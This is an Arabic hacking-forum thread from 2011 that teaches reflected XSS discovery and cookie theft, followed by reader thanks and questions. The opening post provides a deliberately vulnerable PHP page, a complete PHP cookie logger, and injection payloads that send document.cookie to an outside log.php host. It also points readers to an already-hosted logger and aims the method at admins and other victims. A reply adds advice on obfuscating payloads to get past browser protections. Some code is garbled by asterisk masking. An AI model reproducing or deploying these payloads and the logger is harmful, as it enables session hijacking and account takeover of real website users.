:: vBspiders Professional Network ::
صفحة 1 من 4 1 23 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ (http://www.vbspiders.com/vb/t58067.html)

bleu moon 08-21-2011 03:26 PM
[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
بسم الله الرحمآن الرحيم


ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss



################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا :)

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت :)
انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره :nosweat:

نسميه مثلا ..~

xss.php

http://im9.gulfup.com/2011-08-21/1313925532191.jpg

ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

كود PHP:

<?
echo $_GET***91;'test'***93; ;

echo '<b>@nor15din</b>'
?>
http://im9.gulfup.com/2011-08-21/1313925815531.jpg

طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع :nosweat:


http://im9.gulfup.com/2011-08-21/1313926238671.jpg

طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

كود PHP:

'"--></style></script>***************("Www.VbspiderS.Com")</script> 
بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~


http://im9.gulfup.com/2011-08-21/1313926438201.jpg

تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو :in_love:

طيب نشوف السورس كود بتاعوا ..~

كود PHP:

<?php 


function GetIP() 

    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        $ip $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        $ip "unknown"
    return($ip); 


function logData() 

    $ipLog="nor15din.txt"
    $****** = $_SERVER***91;'QUERY_STRING'***93;; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals$ip getenv('REMOTE_ADDR'); 
    else $ip GetIP(); 

    $rem_port $_SERVER***91;'REMOTE_PORT'***93;; 
    $user_agent $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    $rqst_method $_SERVER***91;'METHOD'***93;; 
    $rem_host $_SERVER***91;'REMOTE_HOST'***93;; 
    $referer $_SERVER***91;'HTTP_REFERER'***93;; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog""a+"); 

    if (preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
        fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    fclose($log); 


logData();

echo '<b>powered by vbspiders team</b>'
?>
لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~


الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt

:fruits_cherry:

طيب الآن كيف نستغل التغره ..~


يلزمنى كود تلغيم ..~

كود PHP:

"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script> 
or

كود PHP:

"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script> 
حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره


http://im9.gulfup.com/2011-08-21/1313927231191.jpg

اقتباس:
http://localhost/xss.php?test="><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>
نضط اوونتر ونروح نفتح الملف nor15din.txt

اقتباس:
IP: | PORT: 56840 | HOST: | Agent: | METHOD: | REF: | DATE: | ******: ******=
ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(

:sadwalk:


لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML

:showoff:

لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز :)

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات :)

http://www.illicitromance.com/nor15din.txt

ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

http://www.vbspiders.com/vb/t38054.html

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan

:bleh:

جديد استخدامات xss وهي الـ phishing login




بالتوفيق ..
@nor15din

Crazy Dz 08-21-2011 03:38 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
بارك الله فيك علي شرح ثغرة قوية

k4$p3r-MA 08-21-2011 03:40 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
:icon30::icon30: بارك الله فيك

bleu moon 08-21-2011 03:41 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Crazy Dz (المشاركة 388184)
بارك الله فيك علي شرح ثغرة قوية
والله تغره قويه خصوصا اذا كانت من نوع stored xss

:blushing:

bleu moon 08-21-2011 03:43 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة k4$p3r-MA (المشاركة 388186)
woooow thx fun بارك الله فيك
thx fun :schmoll:

شفتني العب مع القرده ؟

-------------------------------------

برب بمزح ههه
يعطيك العافيه يا حبيبي كاسبر !
الشرح فيديوا يلي قلت لي عنه رح انزلوا لك ان شاء الله :(

Dr.Mix 08-21-2011 04:51 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

bleu moon 08-21-2011 05:59 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Haboubamix (المشاركة 388198)
مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم
يعطيك العافيه ..~

:2:

Antivirus7 08-21-2011 06:10 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك :icon30:
تقبل مروري
:smile:

bleu moon 08-21-2011 06:57 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Antivirus7 (المشاركة 388218)
وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك :icon30:
تقبل مروري
:smile:
منور الموضوع يا حلو والله :)
تسلم على المرور العطر

:blush-anim-cl:

DR.THMoORY 08-21-2011 09:15 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
بطل حبيبي..
يسلمو ايديك..

bleu moon 08-21-2011 09:26 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة DR.THMoORY (المشاركة 388252)
بطل حبيبي..
يسلمو ايديك..
منور الموضوع يا حبيبي

:fruits_cherry:

mass1993 08-21-2011 11:30 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

bleu moon 08-22-2011 07:35 AM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة mass1993 (المشاركة 388280)
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي
انت رافع ملف الوج على السيرفرا الشخصي وهذا غلط !
لازم يكون ع شل :(

:2:

dragonnet 08-22-2011 08:52 AM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
مشكور صديقي !!

bleu moon 08-22-2011 08:55 AM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة dragonnet (المشاركة 388397)
مشكور صديقي !!
:2:

Cyber Code 08-22-2011 01:34 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
good job :)
keep up

bleu moon 08-22-2011 01:40 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Cyber Code (المشاركة 388412)
good job :)
keep up
:bleh:

ZrIqE ViRuS 08-22-2011 02:20 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
يعطيك الف الف عافيه يا غالي.........


اقتباس:
المشاركة الأصلية كتبت بواسطة mass1993 (المشاركة 388280)
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي
اممممممممم
هاد السر بهاي الثغره والي محتكرها المحترفين ......!!
بتعرف شغله

انت لازم تضع الاستغلال بداخل صفحه
html
وتشفر الاستغلال
وبعد تشفر صفحه
html
;)
اعملك شويه بحث وصدقني رح تزبط معاك

السبب بانه ما زبط معاك هو المتصفحات الحديثه بتعمل شويه حمايه لها من هاي الثغره
لكن التشفير ما عليه حمايه ......



مشكور يا نوووووور كثير ع تعبك وشرحك
وفقت حبيبي

bleu moon 08-22-2011 02:21 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
يعطيك العافيه حبيبي فولكانو

اجتياح الجراد 08-22-2011 03:42 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة

والله الاخ ما قصر في شرحها واصل حبيبي

bleu moon 08-22-2011 04:01 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة اجتياح الجراد (المشاركة 388429)
الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة

والله الاخ ما قصر في شرحها واصل حبيبي
انا كمان كنت مابعرف كيف استغلها :nosweat:
بارك الله فيك منور الموضوع ..~

:2:

The Final Doom 08-22-2011 04:58 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
تسـلم كثير حبيبي .,,
شرحك واضح + جميل !
cry
هههههه

bleu moon 08-22-2011 05:04 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Doom[Ps] (المشاركة 388436)
تسـلم كثير حبيبي .,,
شرحك واضح + جميل !
cry
هههههه
هلا حبيبي دووم كيف اخبارك ؟
بعرفها مليح بلا .. ~
ههه
الضاهر الكلمه عجبتك :sad_1:

cry

منور الموضوع

:sad_1:

double-zero 08-22-2011 07:54 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
شرح جميل ومنسق .. يعطيك العافية يابطل واصـــــــل ^_^

bleu moon 08-22-2011 08:01 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة double-zero (المشاركة 388481)
شرح جميل ومنسق .. يعطيك العافية يابطل واصـــــــل ^_^
بارك الله فيك :3:

aircrack -ng 08-22-2011 10:55 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
باراك الله فيك نور موضوع قوي

bleu moon 08-22-2011 11:15 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Spartacus (المشاركة 388515)
باراك الله فيك نور موضوع قوي
هلا حبيبي نسيموا !
منور الموضوع زي مصباح 1000 وات


1000W

:shutup:

Jaguar.PS 08-27-2011 06:34 PM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
شو هالحلاوة هاي ولك !

جو اون مان :)

bleu moon 08-27-2011 06:42 PM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Jaguar.PS (المشاركة 389440)
شو هالحلاوة هاي ولك !

جو اون مان :)
:sad_1:

thx

:2:

kasper-misr 08-28-2011 03:41 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
بارك الله فبك بس انا عندي استفسار بسيط

هل يمكن ان نرفع ملف علي موفع معين ويكون هذا الملف مصاب بثغره xss
ونقوم نحن باستغلال هذا الملف ,ولا لازم يكون الموقع ذات نفسه يكون مصاب بثغره xss
علشان نسرف الكوكيز

وهل سرقه الكوكيز للاعضاء المسجلين في الموقع ققط ولا لكل من يدخل علي الموقع من الزوار

انا اسف اطلت عليك ولكن اردت ان تكتمل الصوره في مخيلتي

bleu moon 08-28-2011 03:50 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة kasper-misr (المشاركة 389526)
بارك الله فبك بس انا عندي استفسار بسيط
:2:

اقتباس:
هل يمكن ان نرفع ملف علي موفع معين ويكون هذا الملف مصاب بثغره xss
yes :D

اقتباس:
وهل سرقه الكوكيز للاعضاء المسجلين في الموقع ققط ولا لكل من يدخل علي الموقع من الزوار
yes

:bleh:

اقتباس:
انا اسف اطلت عليك ولكن اردت ان تكتمل الصوره في مخيلتي
مافي مشكله حبيبي :)

Gx1Sniper 08-28-2011 07:47 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
يعطيك العافية مبدع يا نور الدين

bleu moon 08-28-2011 08:07 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Gx1Sniper (المشاركة 389561)
يعطيك العافية مبدع يا نور الدين
انت المبدع يا غالي ..؛
بحبك

:2:

Gx1Sniper 08-28-2011 08:25 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
يعطيك العافية يا بطل

بس لو سمحت ممكن تضيف الكود في تكست لانه في الموضوع مخربته النجوم

بالتوفيق لك..

bleu moon 08-30-2011 12:22 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Gx1Sniper (المشاركة 389564)
يعطيك العافية يا بطل

بس لو سمحت ممكن تضيف الكود في تكست لانه في الموضوع مخربته النجوم

بالتوفيق لك..
ايوه الاكواد مرفقه :(

bestman 09-02-2011 08:56 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
مشكوررررررررررررررررررررررررررررر

lindows7 09-04-2011 11:37 PM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
عطيك العافية اخوي عالشرح

bleu moon 09-05-2011 12:14 AM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
^_^

thx all :)

gtasa 09-08-2011 01:32 PM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
merciiiiiiiiiiiiiiiiiiiiii

dr.sql 09-09-2011 02:28 PM
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
وااااو يعطيك الف عافيه


الساعة الآن 10:32 AM
صفحة 1 من 4 1 23 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0